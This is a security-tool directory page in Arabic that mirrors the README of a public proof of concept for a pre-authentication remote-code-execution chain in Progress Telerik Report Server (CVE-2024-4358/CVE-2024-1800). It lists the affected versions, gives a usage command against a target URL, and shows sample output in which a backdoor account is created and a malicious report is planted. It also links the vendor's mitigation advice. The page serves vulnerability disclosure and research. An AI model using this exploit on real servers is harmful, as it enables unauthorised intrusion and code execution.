Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/sinsinology/cve-2024-4358
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقةتطوير الحمولات
GitHubsinsinology/cve-2024-4358

CVE-2024-4358

سلسلة RCE قبل المصادقة في Progress Telerik Report Server (CVE-2024-4358/CVE-2024-1800)

عرض المستودع
79155منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-4358 / CVE-2024-1800

سلسلة استغلال لتجاوز المصادقة وإلغاء التسلسل في Telerik Report Server لثغرات CVE-2024-4358/CVE-2024-1800

التحليل الفني

يمكن العثور على تحليل السبب الجذري للثغرة على مدونتي poc

الملخص

الإصدارات المدعومة؟

في الأساس جميعها وقت نشر الاستغلال، وللرجوع إليها مستقبلًا، كل الإصدارات الرئيسية والفرعية في القائمة أدناه:

2012
2017
2018
2019
2020
2021
2022
2023
2024

الاستخدام

python CVE-2024-4358.py --target http://192.168.253.128:83 -c "whoami"

(^_^) Progress Telerik Report Server pre-authenticated RCE (CVE-2024-4358/CVE-2024-1800) || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) random backdoor username: oelycslyun
(*) random backdoor password: cqgnacxljo
(*) Attempting to bypass authentication
(+) Authentication bypass was successful, backdoor account created
(+) Saving credentials to credentials.txt
(+) Successfully authenticated as oelycslyun with password cqgnacxljo
(*) got token: zfCch_LNv0PyKfe7eBDYKXV70IOotwNQ2p82aX-JHIMCisVnTW9PWWYUKljhcRw5alubNOg_gXoHT6-hJk4VO-jGZuzmisLIi5A
(*) Generated random report name: qvwdycugmc
(*) Creating malicious report under name qvwdycugmc
(*) Deserialization exploit finished

إجراءات التخفيف

قم بالتحديث إلى أحدث إصدار، أو خفّف من المخاطر باتباع التعليمات الواردة في النشرة الاستشارية الصادرة عن Progress:

  • https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358

تابعونا على تويتر لآخر الأبحاث الأمنية:

  • SinSinology
  • SummoningTeam

إخلاء المسؤولية

تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود منه استخدامه لمهاجمة الأنظمة إلا بتصريح صريح. القائمون على المشروع غير مسؤولين عن سوء استخدام البرنامج. استخدمه بمسؤولية.

تنزيل الأداة